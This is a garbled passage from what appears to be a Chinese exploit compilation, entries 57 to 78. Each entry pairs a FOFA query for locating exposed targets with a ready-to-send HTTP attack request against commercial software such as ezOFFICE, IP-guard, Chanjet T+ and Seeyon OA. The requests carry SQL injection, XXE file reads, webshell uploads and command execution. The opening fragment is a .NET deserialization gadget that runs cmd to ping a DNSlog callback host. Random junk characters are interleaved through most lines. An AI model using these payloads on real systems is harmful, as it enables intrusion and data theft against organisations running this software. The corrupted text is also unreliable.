"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
: o! B& p! q8 M3 A% q/ z "MethodName":"Start",. N- A9 R' S5 N
"ObjectInstance":{6 v6 ?8 o% q+ n* N( }" }1 \
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) j/ i" Y8 f& l, O z' f9 K2 \9 Z
"StartInfo": {% \; x n) J9 r
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 W5 I$ B* x3 s' |* I1 o "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
$ `6 {. L' o" D- ~/ b }
3 u. m4 r3 z% `8 u$ i; E }
: D) k- }. ^7 W }
& l1 O" o5 E% z4 P1 u: ]/ i; S9 }/ L}
3 y- \7 n; `: K* \) o
" p% n: d4 C% C- @- U0 K. S4 l1 E& A' j# g- b, h+ ]
57. 畅捷通T+ keyEdit.aspx SQL注入7 J0 |4 J3 c6 o8 Z8 u: R- n4 S% I1 Y
FOFA:app="畅捷通-TPlus"" v7 T: `3 ~* t* i7 a+ Y; {4 `" T2 x7 m
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1 R( K2 q! q7 L& N& e; A b: O
Host: host
# J" M& J! d; V6 D- l) a3 zUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" [" }/ n9 \7 f% r& K; M* GAccept-Charset: utf-8
- R! Q* G( D( r' i9 F6 x3 Q: Q( SAccept-Encoding: gzip, deflate* f$ r) z4 V! e, t' ]# ?
Connection: close
2 z' C; Y4 @/ J* w, b0 z8 z# B
7 V- l G3 O; f5 q
! D% P7 m9 @ U, S$ \58. 畅捷通T+ KeyInfoList.aspx sql注入3 S$ C+ E" A: @$ I( v$ p/ [+ ]
FOFA:app="畅捷通-TPlus"# v4 g+ \+ e0 N' X( u
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.17 Z# g/ q, P. ?: A
Host: your-ip
! @' [3 ^1 A! TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ X" o& P* S: n, [& P, M, ]8 G% x
Accept-Charset: utf-83 A: | K' \; Y+ c8 l* T
Accept-Encoding: gzip, deflate
b& m9 f. l( A5 K8 VConnection: close, T& {: |$ _7 Y0 C* H: D. R
) b% z" Q, M' q+ _" A. w: U7 Z+ s/ D
6 n9 e- `1 v9 I. u3 l% E' H0 T! T59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
# E% n! W% y* x; |FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"1 y' r/ @8 A' ~/ G4 p7 G4 s# c
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1; m3 y# Y/ K3 C" z: }& ?* N
Host: 192.168.86.128:9090$ @; P% @5 l. \0 h% a% r: G
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36& }& C: k$ S: Q
Connection: close
& l2 f( E- O# [Content-Length: 1669 d W% A5 c% I3 A+ H
Accept: */*. o! N7 b; y& @; u
Accept-Language: en! c `$ B& W" Z5 l3 ]( L
Content-Type: application/x-www-form-urlencoded: Q" W6 V3 R2 w7 X
Accept-Encoding: gzip1 u. @1 A3 M7 S4 \) k. B X/ y9 I
; E' T+ X, J, j2 F6 }
PAYLOAD N$ U0 `( e6 \, W
! h" a* X1 ^7 S1 d2 a7 |* I. R
7 o, x; A1 I( v8 D60. 百卓Smart管理平台 importexport.php SQL注入
4 d1 |% L) V9 F! D4 XFOFA:title="Smart管理平台"
7 m" U% i2 g- n4 uGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1+ B& K4 Y: _2 _. f% E
Host:) j$ \1 k7 ^' V8 p+ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( G2 {1 @, E) v2 j; |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ ]1 \( S2 H# Z
Accept-Encoding: gzip, deflate- T( Q8 J2 C- g6 K
Accept-Language: zh-CN,zh;q=0.9
+ p! x, i' Q1 Q: k2 cConnection: close6 b/ E7 A0 F& j
) {7 s! M. M; ?: D/ V) X
) h+ R. b0 w, r# Y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ Q; C. i' Z' S& m0 \* R& L6 a+ @
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
& \) \" U/ Y- A8 I6 M( x2 V0 I( c+ vPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
3 l1 X$ L( p; z- }2 [0 P, z% S8 fHost: x.x.x.x
. p# N4 a+ c: k, ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: @5 ?( w* Z" k( RConnection: close& i: ~$ e, w" X. ^% f! ~6 A
Content-Length: 27( n) M/ r+ A3 ]$ t7 _
Accept: */*5 o& D8 D6 w* W- q
Accept-Encoding: gzip, deflate* T# h# n5 ], e9 w: }
Accept-Language: en# @& k6 S/ g+ L0 r: [: N0 O- J
Content-Type: application/x-www-form-urlencoded8 j. z4 N+ n5 B* U: Z4 M: ^
' T; Y; x3 R0 [% x, r
8uxssX66eqrqtKObcVa0kid98xa" a/ d' J* A1 G$ ?- ?1 W, ^
3 k, L& t# Q, F( t; ~$ ?5 L; X/ K
* U+ H" |# }: A' k
62. IP-guard WebServer 远程命令执行2 h( T! f3 I7 Y1 H4 }5 K) @& L
FOFA:"IP-guard" && icon_hash="2030860561") l9 G6 C, S: I: p$ V& v- m
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
z) x2 {7 K6 v1 wHost: x.x.x.x
. w- G9 p9 X# x& a k) [User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
- }: N. Q6 x" o. P2 z' [Connection: close, u# q" S! i" H4 E- [; _# r- ^# W
Accept: */*( F5 g; J0 E$ U" I6 @
Accept-Language: en
5 h$ ~1 m* |: ?- a/ ]! nAccept-Encoding: gzip
3 O2 ~: y, x) S/ f" {) m/ j; I& k" |5 K
+ C" @9 h# U% R
访问
9 T5 {! e9 m `8 n% K" Z0 ]. N0 d
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
. ^0 s4 I6 s( m: O3 |( }, O" y6 @# @Host: x.x.x.x
6 ] X0 n2 X/ U8 W, m% N( {7 H: r% y4 o$ W H* U( w+ F
) K6 z) k) j" N* {7 b
63. IP-guard WebServer任意文件读取
0 {8 W1 f# _( k6 j( T& z0 eIP-guard < 4.82.0609.0
h; [) l, N5 M. C8 a- aFOFA:icon_hash="2030860561"0 Q( D' R1 P n. m7 b4 X- T
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 u5 |* L. f& E2 H& ~# U KHost: your-ip
; F1 b6 z9 [( ]! ^; ]+ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 e/ ^6 N8 W% `( K8 c# aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% f, |; e7 }9 {, ~6 \2 TAccept-Encoding: gzip, deflate
+ \' S- x( ~1 kAccept-Language: zh-CN,zh;q=0.90 ~+ F) f5 f( |4 J
Connection: close& w5 X' a% @2 Q+ z
Content-Type: application/x-www-form-urlencoded
$ H! g- l9 o7 N6 I6 W, s, q( y+ G* p+ W( h6 M- K" O
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A; `; b9 l0 n- o1 A6 d2 z
# I2 \- s: \9 S# V% |
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 |2 H/ O+ k) Q3 T' oFOFA:body="/Scripts/EnjoyMsg.js"
$ y0 I7 h, I# R8 @, K1 P* TPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
0 A" l7 j6 ~1 E' gHost: 192.168.86.128:9001" Y, @# u3 l/ z7 F# ]2 H; @- e, E
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
1 U! ~2 p) J1 ]Connection: close
1 `) [4 G; Z' a' nContent-Length: 369% C% }9 g5 q5 _4 Y3 W; V
Accept: */*
6 o2 G* U9 _; [ M8 }1 A) X( LAccept-Language: en ?1 j Y" S( y3 y& K: R
Content-Type: text/xml; charset=utf-8
' D$ I9 x+ j: p/ C3 M O; z( J0 k bAccept-Encoding: gzip
; q! N3 \& @9 V! j* y
9 }6 t$ j& v g0 c) t; H0 f6 p k<?xml version="1.0" encoding="utf-8"?>4 O; o/ _) n6 G' k: `2 B1 }/ A3 o
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# E# I% j- \' c4 j. H% e% A<soap:Body>
2 @5 e1 a& G% } z/ E <GetOSpById xmlns="http://tempuri.org/">
. Z9 e2 b: @6 l <sId>1';waitfor delay '0:0:5'--+</sId>& g T( s0 }1 ?" H' m& L0 x
</GetOSpById>
3 s$ s! m! B, N0 q5 p1 Y. h- E </soap:Body># O z, B/ A; F& i5 H
</soap:Envelope>& G5 b+ F' W8 \; i- x. @
0 f# [6 m9 ]$ g' S7 [( R3 N1 ]' Q0 H
9 z5 n0 t( q5 d5 r7 Y# T65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过$ D% U$ v; }5 T) d+ j7 q
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
6 I8 X' ^! p& T2 r响应200即成功创建账号test123456/123456- p$ L! y2 G! h2 `$ @
POST /SystemMng.ashx HTTP/1.1# P9 U' X2 w3 C. s( n
Host:
& U/ }' d2 e/ [* _8 R& _User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)6 [0 u: o! v* d9 Z3 v7 k
Accept-Encoding: gzip, deflate% E5 v0 a- I) v+ c
Accept: */*
6 i; |8 `8 o2 p$ _) u5 [- G- tConnection: close# z; c6 u: f: S8 M4 Q6 S
Accept-Language: en
+ d/ u* f' `# V" ^) NContent-Length: 1745 a2 ]8 C. c( Z* r4 O/ X5 f9 [ t! `
$ W5 O3 ^, F0 Z, ~4 p$ I2 U7 X5 [operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
7 E+ ^+ q: L3 n9 X! H
8 H/ [. Q- M7 R. `$ k/ t; [% Z8 N/ O, @. g7 y
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
9 d$ m+ t. F" j6 ?# A: N+ L. YFOFA:app="万户ezOFFICE协同管理平台"
( Z' g) b& F- B; m; K0 ^4 @/ `) j: x; K
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, @0 n h; A9 H
Host: x.x.x.x, R, Q' b3 x5 \/ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 T4 h7 Y3 M2 o: pConnection: close5 w; J/ ~" t; z! q: d
Accept: */*
9 x8 Y9 ]# X) A/ t) }9 Z( rAccept-Language: en, v" [/ i% Y; G% v1 I+ q
Accept-Encoding: gzip
4 i3 \: y" {( Q% ~2 O7 H# y8 f6 X
4 v L+ k6 f: m/ D第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
- M5 K( S- c, O2 I0 u( c a
' ~0 j: j& ?4 O z( i9 y0 h67. 万户ezOFFICE wpsservlet任意文件上传8 x% Z) R2 b0 w. z' W
FOFA:app="万户网络-ezOFFICE"
5 O; V c0 j5 AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型0 I6 p5 V* z8 `% C7 U
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.10 s) ]! o# ]& \7 w
Host: x.x.x.x
; R8 p, K5 a% B9 W% m6 Q. {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
" S, J4 \$ a& @& eContent-Length: 173
0 w$ t' n) e: E8 B0 k" uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' C6 R" B! v. V* ?
Accept-Encoding: gzip, deflate: o* F* [3 @6 T: u$ e+ i, @8 r
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6 Z! ~0 ?2 K4 ]8 i+ k' W; ]Connection: close
" c! i3 w8 V9 hContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp6 M+ d. _/ ?% `/ f
DNT: 1# M- s; H# ]" u1 w
Upgrade-Insecure-Requests: 11 n- {) A- `6 C- f* k# L T: |
/ S# ?2 e8 w% W( a9 V# b
--ufuadpxathqvxfqnuyuqaozvseiueerp
! q7 \/ r# M+ T3 W0 P: JContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
9 j" l; k% J( }9 W: T2 k
; x- X( s5 ]' o! q( k4 y# J<% out.print("sasdfghjkj");%>
7 L2 _, B7 v; J7 i# R1 v--ufuadpxathqvxfqnuyuqaozvseiueerp--
& t) Z; ?5 u: G" K% D z. ^2 p' R' |- `1 ^0 g% ^+ o; p
) L* z; c) s: I. b' v* }
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
. M& p x- B. L& W( {! `( p) Z# h
68. 万户ezOFFICE wf_printnum.jsp SQL注入! Z8 _9 k# C( G& Q9 F
FOFA:app="万户ezOFFICE协同管理平台"9 [ m8 Z& x" t! @
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 Q( e5 Q1 I( T' t& O
Host: {{host}}
6 j. G9 S- a) x1 s* v1 ]) BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
1 s6 ~" i) d1 I \! h& L% `) jAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* p2 v- C8 b8 w9 h- r( q
Accept-Encoding: gzip, deflate
' B$ n/ p; e$ n6 r/ ^4 R) g BAccept-Language: zh-CN,zh;q=0.9+ ~8 J! R( ^, y6 w8 h
Connection: close5 F- `, { [& M7 r5 P4 Y4 I$ j: d" c
: X2 K1 u9 m$ X' I
% c/ d* ?* m0 ^5 E69. 万户 ezOFFICE contract_gd.jsp SQL注入
1 @4 B+ U$ p4 d5 l/ N, M! d' ZFOFA:app="万户ezOFFICE协同管理平台"
* t+ i, ^! q, a* j+ SGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
- T2 ?8 ~- ?+ Y3 d, k# f3 f! _2 GHost: your-ip5 z+ D5 N' B5 M4 R0 b6 g' Y) A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 f3 r1 B* q- e4 CAccept-Encoding: gzip, deflate2 Q3 d4 Q6 V8 D, j
Accept: */*, s% T7 U4 H/ C
Connection: keep-alive
# R- U+ C4 d O+ f9 b( E# Z' r- b2 L0 |$ E! N% P8 Q6 w) A' P' A7 |
2 `0 v9 y {% C( D5 B2 e" m70. 万户ezEIP success 命令执行
6 W/ k1 a, h$ k1 l9 {) T1 ~FOFA:app="万户网络-ezEIP"% |9 l6 q8 b. J$ J8 \0 H9 B, o: z9 k
POST /member/success.aspx HTTP/1.1# G" \: L+ p# Z
Host: {{Hostname}}
$ y2 s% H: a5 b4 r! C! F8 Z% gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
' J6 _( k3 v: x; ?' X. h2 A! x0 r( c# ?SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=* n( s' c* S4 U, ]+ ~* [7 a- E
Content-Type: application/x-www-form-urlencoded
2 ]* E; X3 A7 p7 A: STYPE: C
" `- @6 u- t* m: B6 `Content-Length: 16702% U- ` G* _. F' Q+ O' A! P6 Q
5 S" J6 F$ V5 X' `5 v__VIEWSTATE=PAYLOAD8 K, g! r0 T1 S! ?
" E* Z: N0 S$ w3 Z. g* v) J
# @( s9 w6 l d, e# Y% y& {71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入2 l5 U5 Y$ p3 p) u
FOFA:body="PM2项目管理系统BS版增强工具.zip"
4 T% J% ~1 K/ d2 |GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
5 F3 Y8 y: C6 x3 n8 iHost: x.x.x.xx.x.x.x
# q# w# ^" q/ q) DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- O) u' H$ `8 ~2 Z$ tConnection: close0 ?% G% |1 A3 V& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) {0 Y) t0 L' S$ j8 ] bAccept-Encoding: gzip, deflate
) H- `6 w3 g/ L7 L7 a% BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 T v0 {0 o, E7 ?# t
Upgrade-Insecure-Requests: 1# o+ G0 |' A" r% f
/ g% e: ]8 c% F( D8 ~
6 Q) m9 V; H$ m" g& d2 \
72. 致远OA getAjaxDataServlet XXE+ B* j# _1 j4 b2 Y. D
FOFA:app="致远互联-OA": @6 `& p7 L- P
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.18 X; x/ L4 N# Q8 K# u' z
Host: 192.168.40.131:8099
+ W; }; A& c6 ~( H: _; r# c' WUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
" D& A% k. [, ^+ dConnection: close2 z$ Q- U0 h. N5 P
Content-Length: 583
* L& Z7 n% E8 k: P: |Content-Type: application/x-www-form-urlencoded6 `5 t- b% W! g, T$ D
Accept-Encoding: gzip; B( p9 Z$ R( H. V
" k: s, W1 c: o U7 rS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
! _/ h1 S6 ? d X0 _9 G% x- P% m9 k! I1 i% f+ c* d/ a0 Z& U" J* C% v
; Q9 C% B" [- O% [$ E) f1 ?
73. GeoServer wms远程代码执行3 F* S) T: h* J, O' s% z6 z
FOFA:icon_hash=”97540678”
5 R9 Z- [/ Y' e2 {POST /geoserver/wms HTTP/1.1: k% b* y+ V. i( Q D" d/ V' F
Host:1 u/ H- j0 g9 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
?4 y; U) w' qContent-Length: 1981
9 V4 g+ {) z$ f' H5 U; sAccept-Encoding: gzip, deflate
3 S# y v% O: ]. ~, P6 Y( JConnection: close- t. o& m9 T) P
Content-Type: application/xml/ D8 x2 A+ {; ]' \" l- }
SL-CE-SUID: 3
/ S. o5 e" Y- c% o3 Z$ P8 T
- ~; r8 }. e Z A; K8 c/ \; hPAYLOAD
0 R! T/ |9 ^8 `8 K# P/ p( e5 `* e0 \ a6 u. j5 a
' B/ ^# h& _& ~/ z$ _: \- i74. 致远M3-server 6_1sp1 反序列化RCE; l) d$ s" o: {( a
FOFA:title="M3-Server"
. S6 P9 Q) r; L( C% qPAYLOAD
w% v; X7 y1 P6 |
1 m" x4 Y- l. a) t, Q4 z- ~$ ]. g75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' u- f, |9 s0 i# l6 b# VFOFA:app="TELESQUARE-TLR-2005KSH"
6 D3 z+ v% k& f* G K1 f, IGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
8 y9 t# I% I- D4 C/ O0 vHost: x.x.x.x
- ?* t1 N* C$ x# G0 F6 w4 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# H3 p, [3 p8 d- _& Z+ b; E* E, AConnection: close' e w* G/ W' m- M8 X/ p1 N5 \! R
Accept: */*
! c, b/ N" t8 EAccept-Language: en
! F( j$ |; N* N- @( A4 DAccept-Encoding: gzip- Z; H8 W" E& ?% N5 c2 Z% u* j
* B' [5 @. z5 i- x. E; r4 c8 ~' ~; z( M! |
GET /cgi-bin/test28256.txt HTTP/1.1
! a2 A% X) x: [ u! hHost: x.x.x.x
6 O+ r1 X9 q& ]( q- A* E( i' P1 m4 A4 t( _' P6 j4 C( _
, w+ G- f' k: y! g1 m( v( H76. 新开普掌上校园服务管理平台service.action远程命令执行* [+ {1 `# i3 N1 n5 b/ o
FOFA:title="掌上校园服务管理平台"
8 ?+ X, M7 s- p) B) e% mPOST /service_transport/service.action HTTP/1.1
" C2 S1 [; j% r7 V5 |Host: x.x.x.x' ?. g; I8 |0 y3 g" u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
; e5 Y3 ]8 q# \6 a- A- WConnection: close* B( x& n# H! X
Content-Length: 211
" h' b/ e, u. _3 z" s" QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! o2 v& |4 P" |; B2 y# F/ \
Accept-Encoding: gzip, deflate
) V/ @0 t r! ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) @9 U1 }0 z( ^& J/ W3 K( U' `Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4. L6 `. L" ?0 e0 w1 c4 P
Upgrade-Insecure-Requests: 1
& Q( T: v( i8 \" P! ~5 \, T
3 J7 Y$ v5 C+ O" Y" L/ A{, d8 y/ `0 N6 \ r! E, `
"command": "GetFZinfo",
0 j; y+ b3 G6 f! ` "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\") V3 K& M/ j) h+ |
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}": k; C0 |, l5 s! j
}
) q) a3 a* e5 k& B5 W3 v* u2 B1 B# E# B" w) P
! i, a# Z0 J# b
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.14 S. e7 ~0 V; f d5 i# \
Host: x.x.x.x; S* l# f" N6 K7 b8 M
2 o* j, y ^' ^+ u* I V3 E
' `5 E* N6 i9 }
4 e, \8 R N; Z* C% x+ l, v; P
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
, ~" l) E# G( t e# O4 {' v1 gFOFA:body="F22WEB登陆"4 i# l6 W6 F8 l# `
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
% s/ Q$ M. k" I. ~Host: x.x.x.x
/ ^; a$ m& I2 s$ _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% O+ u8 ]+ A) K+ o/ T) OConnection: close
: T% {, n x; O& X# D4 nContent-Length: 433% I$ ^0 n/ J" }3 H
Accept: */*/ I% q# q# f# a F+ G2 ]8 g) j0 `
Accept-Encoding: gzip, deflate0 ]& d7 v" Y+ q2 c
Accept-Language: zh-CN,zh;q=0.9
) L+ u- ]$ a! j4 V5 @; ~Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix' O, v4 V% V a+ g- g
P5 V: }& {" j2 u/ K+ m) k7 `* t------------398jnjVTTlDVXHlE7yYnfwBoix
7 A0 t1 r2 Q& H% n _; E4 vContent-Disposition: form-data; name="folder"" U) A* N0 [1 T z4 e
. I8 @) C; W) ^+ S* J. B/upload/udplog
, g3 @$ [0 |! o1 y------------398jnjVTTlDVXHlE7yYnfwBoix
' i& M2 ?" D. u- [3 ^# ?% ~, QContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
5 o2 T1 m6 i# v# {. ~4 ^ [Content-Type: application/octet-stream. ~9 B; ^9 H4 C/ b; l
" z; B; l% a1 h
hello1234567
: Q5 I5 T, @8 ~# U/ e------------398jnjVTTlDVXHlE7yYnfwBoix
0 v6 v$ H+ }9 k" i P% b* J" l \Content-Disposition: form-data; name="Upload"
9 j% t7 \. T7 l3 q) ~0 d K% g, j, F. M2 r
Submit Query
) [& d; P$ O8 L- [. _6 ?------------398jnjVTTlDVXHlE7yYnfwBoix--
; s$ O+ y5 n4 s
$ Q( B/ g/ M7 F7 ]/ M; x. \
: f7 r+ P- \ \$ S78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
) T4 r) b7 O- t& N1 T. \FOFA:icon_hash="2001627082"
+ J" m- o, E. {: L7 o- P* H6 r' n/ gPOST /Platform/System/FileUpload.ashx HTTP/1.1
1 M& X$ d# x" a1 |+ `; A; FHost: x.x.x.x6 y+ N; c% F1 U- A' h% L% @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" w/ x9 W7 v0 b5 Q4 ~
Connection: close' `; p" c- V2 w6 f/ Z( Q* W$ r
Content-Length: 336
( X# {! E5 X2 }Accept-Encoding: gzip" }% ~0 a: W4 C3 F1 k) M
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
$ I' t4 \8 t+ u6 j
6 R `, |* F6 }$ v1 `------YsOxWxSvj1KyZow1PTsh98fdu6l
7 Z* b V r$ E3 b$ N& S4 c7 JContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
: j, [3 D# G% e* wContent-Type: image/png
4 t9 M6 W- D5 H# X& V; u, v2 X, Z3 p# g: u
YsOxWxSvj1KyZow1PTsh98fdu6l
+ G5 \/ R4 X9 L/ Z& \& M; [------YsOxWxSvj1KyZow1PTsh98fdu6l
" x& h; w; S4 ]- a+ R: ?Content-Disposition: form-data; name="target"
. P2 p ~5 f0 t6 G. Q9 F9 `( X$ X6 S) e" @1 J# G) n
/Applications/SkillDevelopAndEHS/9 E; @3 B- c# a0 i5 P, v+ }
------YsOxWxSvj1KyZow1PTsh98fdu6l--: x8 \7 m, }( T( b1 h5 f5 `
" B" f6 S( I* r1 F+ M/ J: I) ^2 c1 Q F1 d; ?8 K
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
